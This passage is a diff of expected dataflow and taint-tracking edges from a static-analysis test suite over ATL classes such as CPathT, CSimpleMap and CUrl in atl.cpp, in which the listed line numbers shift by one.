atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:596:10:596:10 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:597:10:597:10 | c | | +| atl.cpp:593:24:593:24 | call to CComSafeArray | atl.cpp:598:3:598:3 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:595:10:595:10 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:596:10:596:10 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:597:10:597:10 | c | | +| atl.cpp:594:5:594:5 | ref arg c | atl.cpp:598:3:598:3 | c | | | atl.cpp:595:10:595:10 | ref arg c | atl.cpp:596:10:596:10 | c | | -| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:597:3:597:3 | c | | -| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:597:3:597:3 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:600:5:600:5 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:601:10:601:10 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:602:10:602:10 | c | | -| atl.cpp:599:24:599:24 | call to CComSafeArray | atl.cpp:603:3:603:3 | c | | -| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:601:10:601:10 | c | | -| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:602:10:602:10 | c | | -| atl.cpp:600:5:600:5 | ref arg c | atl.cpp:603:3:603:3 | c | | -| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:602:10:602:10 | c | | -| atl.cpp:601:10:601:10 | ref arg c | atl.cpp:603:3:603:3 | c | | -| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:603:3:603:3 | c | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:665:11:665:11 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:674:20:674:20 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:679:14:679:14 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:687:11:687:11 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:693:15:693:15 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:698:24:698:24 | x | | -| atl.cpp:664:13:664:33 | call to indirect_source | atl.cpp:704:30:704:30 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:674:20:674:20 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:679:14:679:14 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:687:11:687:11 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:693:15:693:15 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:665:11:665:11 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:665:11:665:11 | x | atl.cpp:665:11:665:12 | call to CPathT | TAINT | -| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:666:27:666:27 | p | | -| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:667:8:667:8 | p | | -| atl.cpp:665:11:665:12 | call to CPathT | atl.cpp:669:12:669:12 | p | | -| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:667:8:667:8 | p | | -| atl.cpp:666:27:666:27 | ref arg p | atl.cpp:669:12:669:12 | p | | -| atl.cpp:667:8:667:8 | p [post update] | atl.cpp:669:12:669:12 | p | | -| atl.cpp:667:10:667:18 | ref arg m_strPath | atl.cpp:670:11:670:19 | m_strPath | | -| atl.cpp:669:12:669:12 | p | atl.cpp:669:12:669:13 | call to CPathT | | -| atl.cpp:669:12:669:13 | call to CPathT | atl.cpp:670:8:670:9 | p2 | | -| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:674:5:674:5 | p | | -| atl.cpp:673:11:673:11 | call to CPathT | atl.cpp:675:10:675:10 | p | | -| atl.cpp:674:5:674:5 | ref arg p | atl.cpp:675:10:675:10 | p | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:679:14:679:14 | x | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:687:11:687:11 | x | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:693:15:693:15 | x | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:674:20:674:20 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:679:5:679:5 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:680:10:680:10 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:683:11:683:11 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:684:10:684:10 | p | | -| atl.cpp:678:11:678:11 | call to CPathT | atl.cpp:688:10:688:10 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:680:10:680:10 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:683:11:683:11 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:684:10:684:10 | p | | -| atl.cpp:679:5:679:5 | ref arg p | atl.cpp:688:10:688:10 | p | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:687:11:687:11 | x | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:693:15:693:15 | x | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:679:14:679:14 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:683:11:683:11 | p | | -| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:684:10:684:10 | p | | -| atl.cpp:680:10:680:10 | p [post update] | atl.cpp:688:10:688:10 | p | | -| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:684:12:684:20 | m_strPath | | -| atl.cpp:680:12:680:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | -| atl.cpp:682:11:682:12 | call to CPathT | atl.cpp:683:5:683:6 | p2 | | -| atl.cpp:683:11:683:11 | call to operator char *& | atl.cpp:683:8:683:8 | call to operator+= | TAINT | -| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:684:10:684:10 | p | | -| atl.cpp:683:11:683:11 | ref arg p | atl.cpp:688:10:688:10 | p | | -| atl.cpp:684:10:684:10 | p [post update] | atl.cpp:688:10:688:10 | p | | -| atl.cpp:684:12:684:20 | ref arg m_strPath | atl.cpp:688:12:688:20 | m_strPath | | -| atl.cpp:686:11:686:12 | call to CPathT | atl.cpp:687:5:687:6 | p3 | | -| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:693:15:693:15 | x | | -| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:687:11:687:11 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:687:11:687:11 | x | atl.cpp:687:8:687:8 | call to operator+= | TAINT | -| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:693:5:693:5 | p | | -| atl.cpp:692:11:692:11 | call to CPathT | atl.cpp:694:10:694:10 | p | | -| atl.cpp:693:5:693:5 | ref arg p | atl.cpp:694:10:694:10 | p | | -| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:698:24:698:24 | x | | -| atl.cpp:693:15:693:15 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:698:5:698:5 | p | | -| atl.cpp:697:11:697:11 | call to CPathT | atl.cpp:699:10:699:10 | p | | -| atl.cpp:698:5:698:5 | ref arg p | atl.cpp:699:10:699:10 | p | | -| atl.cpp:698:24:698:24 | ref arg x | atl.cpp:704:30:704:30 | x | | -| atl.cpp:703:11:703:11 | call to CPathT | atl.cpp:704:15:704:15 | p | | -| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:705:10:705:11 | p2 | | -| atl.cpp:704:17:704:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | -| atl.cpp:705:10:705:11 | p2 [post update] | atl.cpp:706:10:706:11 | p2 | | -| atl.cpp:733:11:733:21 | call to source | atl.cpp:736:11:736:11 | x | | -| atl.cpp:733:11:733:21 | call to source | atl.cpp:748:11:748:11 | x | | -| atl.cpp:733:11:733:21 | call to source | atl.cpp:752:23:752:23 | x | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:736:5:736:5 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:737:10:737:10 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:738:5:738:5 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:739:10:739:10 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:743:10:743:10 | a | | -| atl.cpp:735:23:735:23 | call to CSimpleArray | atl.cpp:745:3:745:3 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:737:10:737:10 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:738:5:738:5 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:739:10:739:10 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:736:5:736:5 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:738:5:738:5 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:739:10:739:10 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:737:10:737:10 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:739:10:739:10 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:738:5:738:5 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:743:10:743:10 | a | | -| atl.cpp:739:10:739:10 | ref arg a | atl.cpp:745:3:745:3 | a | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:742:10:742:11 | a2 | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:743:5:743:6 | a2 | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:744:10:744:11 | a2 | | -| atl.cpp:741:23:741:24 | call to CSimpleArray | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:743:5:743:6 | a2 | | -| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | -| atl.cpp:742:10:742:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:744:10:744:11 | a2 | | -| atl.cpp:743:5:743:6 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:743:10:743:10 | a | atl.cpp:743:5:743:6 | ref arg a2 | TAINT | -| atl.cpp:743:10:743:10 | a | atl.cpp:743:8:743:8 | call to operator= | TAINT | -| atl.cpp:744:10:744:11 | ref arg a2 | atl.cpp:745:3:745:3 | a2 | | -| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:748:5:748:5 | a | | -| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:749:10:749:10 | a | | -| atl.cpp:747:23:747:23 | call to CSimpleArray | atl.cpp:754:3:754:3 | a | | -| atl.cpp:748:5:748:5 | ref arg a | atl.cpp:749:10:749:10 | a | | -| atl.cpp:748:5:748:5 | ref arg a | atl.cpp:754:3:754:3 | a | | -| atl.cpp:749:10:749:10 | ref arg a | atl.cpp:754:3:754:3 | a | | -| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:752:15:752:16 | a2 | | -| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:753:10:753:11 | a2 | | -| atl.cpp:751:23:751:24 | call to CSimpleArray | atl.cpp:754:3:754:3 | a2 | | -| atl.cpp:752:18:752:21 | call to Find | atl.cpp:753:13:753:15 | pos | | -| atl.cpp:753:10:753:11 | ref arg a2 | atl.cpp:754:3:754:3 | a2 | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:781:20:781:20 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:791:26:791:26 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:796:32:796:32 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:802:22:802:22 | x | | -| atl.cpp:778:16:778:31 | call to source | atl.cpp:807:30:807:30 | x | | -| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:781:5:781:5 | a | | -| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:782:10:782:10 | a | | -| atl.cpp:780:33:780:33 | call to CSimpleMap | atl.cpp:783:3:783:3 | a | | -| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:782:10:782:10 | a | | -| atl.cpp:781:5:781:5 | ref arg a | atl.cpp:783:3:783:3 | a | | -| atl.cpp:782:10:782:10 | ref arg a | atl.cpp:783:3:783:3 | a | | -| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:786:16:786:16 | a | | -| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:787:10:787:10 | a | | -| atl.cpp:785:33:785:33 | call to CSimpleMap | atl.cpp:788:3:788:3 | a | | -| atl.cpp:786:18:786:24 | call to FindKey | atl.cpp:787:23:787:25 | pos | | -| atl.cpp:787:10:787:10 | ref arg a | atl.cpp:788:3:788:3 | a | | -| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:791:16:791:16 | a | | -| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:792:10:792:10 | a | | -| atl.cpp:790:33:790:33 | call to CSimpleMap | atl.cpp:793:3:793:3 | a | | -| atl.cpp:791:18:791:24 | call to FindVal | atl.cpp:792:23:792:25 | pos | | -| atl.cpp:792:10:792:10 | ref arg a | atl.cpp:793:3:793:3 | a | | -| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:796:16:796:16 | a | | -| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:798:10:798:10 | a | | -| atl.cpp:795:33:795:33 | call to CSimpleMap | atl.cpp:799:3:799:3 | a | | -| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:798:10:798:10 | a | | -| atl.cpp:796:16:796:16 | ref arg a | atl.cpp:799:3:799:3 | a | | -| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:797:10:797:12 | key | | -| atl.cpp:796:18:796:30 | call to ReverseLookup | atl.cpp:798:19:798:21 | key | | -| atl.cpp:797:10:797:12 | ref arg key | atl.cpp:798:19:798:21 | key | | -| atl.cpp:798:10:798:10 | ref arg a | atl.cpp:799:3:799:3 | a | | -| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:802:5:802:5 | a | | -| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:803:10:803:10 | a | | -| atl.cpp:801:33:801:33 | call to CSimpleMap | atl.cpp:804:3:804:3 | a | | -| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:803:10:803:10 | a | | -| atl.cpp:802:5:802:5 | ref arg a | atl.cpp:804:3:804:3 | a | | -| atl.cpp:803:10:803:10 | ref arg a | atl.cpp:804:3:804:3 | a | | -| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:807:5:807:5 | a | | -| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:808:10:808:10 | a | | -| atl.cpp:806:33:806:33 | call to CSimpleMap | atl.cpp:809:3:809:3 | a | | -| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:808:10:808:10 | a | | -| atl.cpp:807:5:807:5 | ref arg a | atl.cpp:809:3:809:3 | a | | -| atl.cpp:808:10:808:10 | ref arg a | atl.cpp:809:3:809:3 | a | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:852:16:852:16 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:865:19:865:19 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:871:23:871:23 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:876:22:876:22 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:881:22:881:22 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:886:24:886:24 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:891:21:891:21 | x | | -| atl.cpp:850:13:850:33 | call to indirect_source | atl.cpp:896:22:896:22 | x | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:852:3:852:5 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:853:8:853:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:854:8:854:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:855:8:855:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:856:8:856:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:857:8:857:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:858:8:858:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:859:8:859:10 | url | | -| atl.cpp:851:8:851:10 | call to CUrl | atl.cpp:899:1:899:1 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:853:8:853:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:854:8:854:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:855:8:855:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:856:8:856:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:857:8:857:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:858:8:858:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:859:8:859:10 | url | | -| atl.cpp:852:3:852:5 | ref arg url | atl.cpp:899:1:899:1 | url | | -| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:865:5:865:8 | url2 | | -| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:866:5:866:8 | url2 | | -| atl.cpp:862:10:862:13 | call to CUrl | atl.cpp:868:3:868:3 | url2 | | -| atl.cpp:863:11:863:13 | len | atl.cpp:866:29:866:31 | len | | -| atl.cpp:864:10:864:15 | buffer | atl.cpp:866:20:866:25 | buffer | | -| atl.cpp:864:10:864:15 | buffer | atl.cpp:867:10:867:15 | buffer | | -| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:866:5:866:8 | url2 | | -| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:868:3:868:3 | url2 | | -| atl.cpp:866:20:866:25 | ref arg buffer | atl.cpp:867:10:867:15 | buffer | | -| atl.cpp:866:28:866:31 | ref arg & ... | atl.cpp:866:29:866:31 | len [inner post update] | | -| atl.cpp:866:29:866:31 | len | atl.cpp:866:28:866:31 | & ... | | -| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:871:5:871:8 | url2 | | -| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:872:10:872:13 | url2 | | -| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:873:3:873:3 | url2 | | -| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:872:10:872:13 | url2 | | -| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:873:3:873:3 | url2 | | -| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:876:5:876:8 | url2 | | -| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:877:10:877:13 | url2 | | -| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:878:3:878:3 | url2 | | -| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:877:10:877:13 | url2 | | -| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:878:3:878:3 | url2 | | -| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:881:5:881:8 | url2 | | -| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:882:10:882:13 | url2 | | -| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:883:3:883:3 | url2 | | -| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:882:10:882:13 | url2 | | -| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:883:3:883:3 | url2 | | -| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:886:5:886:8 | url2 | | -| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:887:10:887:13 | url2 | | -| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:888:3:888:3 | url2 | | -| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:887:10:887:13 | url2 | | -| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:888:3:888:3 | url2 | | -| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:891:5:891:8 | url2 | | -| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:892:10:892:13 | url2 | | -| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:893:3:893:3 | url2 | | -| atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:892:10:892:13 | url2 | | -| atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:893:3:893:3 | url2 | | -| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:896:5:896:8 | url2 | | -| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:897:10:897:13 | url2 | | -| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:898:3:898:3 | url2 | | -| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:897:10:897:13 | url2 | | -| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:898:3:898:3 | url2 | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:597:10:597:10 | c | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:598:3:598:3 | c | | +| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:597:10:597:10 | c | | +| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:598:3:598:3 | c | | +| atl.cpp:597:10:597:10 | ref arg c | atl.cpp:598:3:598:3 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:601:5:601:5 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:602:10:602:10 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:603:10:603:10 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:604:3:604:3 | c | | +| atl.cpp:601:5:601:5 | ref arg c | atl.cpp:602:10:602:10 | c | | +| atl.cpp:601:5:601:5 | ref arg c | atl.cpp:603:10:603:10 | c | | +| atl.cpp:601:5:601:5 | ref arg c | atl.cpp:604:3:604:3 | c | | +| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:603:10:603:10 | c | | +| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:604:3:604:3 | c | | +| atl.cpp:603:10:603:10 | ref arg c | atl.cpp:604:3:604:3 | c | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:666:11:666:11 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:675:20:675:20 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:680:14:680:14 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:688:11:688:11 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:694:15:694:15 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:699:24:699:24 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:705:30:705:30 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:675:20:675:20 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:680:14:680:14 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:688:11:688:11 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:666:11:666:11 | x | atl.cpp:666:11:666:12 | call to CPathT | TAINT | +| atl.cpp:666:11:666:12 | call to CPathT | atl.cpp:667:27:667:27 | p | | +| atl.cpp:666:11:666:12 | call to CPathT | atl.cpp:668:8:668:8 | p | | +| atl.cpp:666:11:666:12 | call to CPathT | atl.cpp:670:12:670:12 | p | | +| atl.cpp:667:27:667:27 | ref arg p | atl.cpp:668:8:668:8 | p | | +| atl.cpp:667:27:667:27 | ref arg p | atl.cpp:670:12:670:12 | p | | +| atl.cpp:668:8:668:8 | p [post update] | atl.cpp:670:12:670:12 | p | | +| atl.cpp:668:10:668:18 | ref arg m_strPath | atl.cpp:671:11:671:19 | m_strPath | | +| atl.cpp:670:12:670:12 | p | atl.cpp:670:12:670:13 | call to CPathT | | +| atl.cpp:670:12:670:13 | call to CPathT | atl.cpp:671:8:671:9 | p2 | | +| atl.cpp:674:11:674:11 | call to CPathT | atl.cpp:675:5:675:5 | p | | +| atl.cpp:674:11:674:11 | call to CPathT | atl.cpp:676:10:676:10 | p | | +| atl.cpp:675:5:675:5 | ref arg p | atl.cpp:676:10:676:10 | p | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:680:14:680:14 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:688:11:688:11 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:680:5:680:5 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:681:10:681:10 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:684:11:684:11 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:685:10:685:10 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:689:10:689:10 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:681:10:681:10 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:684:11:684:11 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:685:10:685:10 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:689:10:689:10 | p | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:688:11:688:11 | x | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:684:11:684:11 | p | | +| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:685:10:685:10 | p | | +| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:689:10:689:10 | p | | +| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:685:12:685:20 | m_strPath | | +| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:689:12:689:20 | m_strPath | | +| atl.cpp:683:11:683:12 | call to CPathT | atl.cpp:684:5:684:6 | p2 | | +| atl.cpp:684:11:684:11 | call to operator char *& | atl.cpp:684:8:684:8 | call to operator+= | TAINT | +| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:685:10:685:10 | p | | +| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:689:10:689:10 | p | | +| atl.cpp:685:10:685:10 | p [post update] | atl.cpp:689:10:689:10 | p | | +| atl.cpp:685:12:685:20 | ref arg m_strPath | atl.cpp:689:12:689:20 | m_strPath | | +| atl.cpp:687:11:687:12 | call to CPathT | atl.cpp:688:5:688:6 | p3 | | +| atl.cpp:688:11:688:11 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:688:11:688:11 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:688:11:688:11 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:688:11:688:11 | x | atl.cpp:688:8:688:8 | call to operator+= | TAINT | +| atl.cpp:693:11:693:11 | call to CPathT | atl.cpp:694:5:694:5 | p | | +| atl.cpp:693:11:693:11 | call to CPathT | atl.cpp:695:10:695:10 | p | | +| atl.cpp:694:5:694:5 | ref arg p | atl.cpp:695:10:695:10 | p | | +| atl.cpp:694:15:694:15 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:694:15:694:15 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:698:11:698:11 | call to CPathT | atl.cpp:699:5:699:5 | p | | +| atl.cpp:698:11:698:11 | call to CPathT | atl.cpp:700:10:700:10 | p | | +| atl.cpp:699:5:699:5 | ref arg p | atl.cpp:700:10:700:10 | p | | +| atl.cpp:699:24:699:24 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:704:11:704:11 | call to CPathT | atl.cpp:705:15:705:15 | p | | +| atl.cpp:705:17:705:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | +| atl.cpp:705:17:705:28 | call to CommonPrefix | atl.cpp:707:10:707:11 | p2 | | +| atl.cpp:706:10:706:11 | p2 [post update] | atl.cpp:707:10:707:11 | p2 | | +| 